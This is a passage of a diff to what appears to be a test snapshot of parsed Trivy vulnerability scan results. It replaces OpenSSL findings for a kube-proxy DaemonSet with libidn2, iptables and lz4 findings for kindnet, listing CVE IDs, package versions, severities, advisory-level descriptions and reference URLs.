"https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "https://gitlab.com/libidn/libidn2/merge_requests/71", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "https://security.gentoo.org/glsa/202003-63", + "https://ubuntu.com/security/notices/USN-4168-1", + "https://usn.ubuntu.com/4168-1/", ], }, "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", + "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://avd.aquasec.com/nvd/cve-2019-12290", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://security.gentoo.org/glsa/202003-63", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://ubuntu.com/security/notices/USN-4168-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://usn.ubuntu.com/4168-1/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "1.8.3-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3520", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-3520", + "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "https://errata.rockylinux.org/RLSA-2021:2575", + "https://github.com/lz4/lz4/pull/972", + "https://linux.oracle.com/cve/CVE-2021-3520.html", + "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "https://security.netapp.com/advisory/ntap-20211104-0005/", + "https://ubuntu.com/security/notices/USN-4968-1", + "https://ubuntu.com/security/notices/USN-4968-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3520", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", + "name": "memory corruption due to an integer overflow bug caused by memmove argument", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://avd.aquasec.com/nvd/cve-2021-3520", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://access.redhat.com/security/cve/CVE-2021-3520", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://errata.rockylinux.org/RLSA-2021:2575", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://github.com/lz4/lz4/pull/972", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://ubuntu.com/security/notices/USN-4968-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-4968-2", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", + }, + { + "type": "URL", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-17543", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "https://access.redhat.com/security/cve/CVE-2019-17543", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "https://github.com/lz4/lz4/issues/801", + "https://github.com/lz4/lz4/pull/756", + "https://github.com/lz4/lz4/pull/760", + "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "https://security.netapp.com/advisory/ntap-20210723-0001/", + "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2020.html", + ], + }, + "category": "Vulnerability", + "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "lz4: heap-based buffer overflow in LZ4_write32", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://avd.aquasec.com/nvd/cve-2019-17543", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://access.redhat.com/security/cve/CVE-2019-17543", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://github.com/lz4/lz4/issues/801", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://github.com/lz4/lz4/pull/756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://github.com/lz4/lz4/pull/760", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", + }, + { + "type": "URL", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "5.2.4-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "5.2.4-1", + "packageName": "liblzma5", "references": [ - 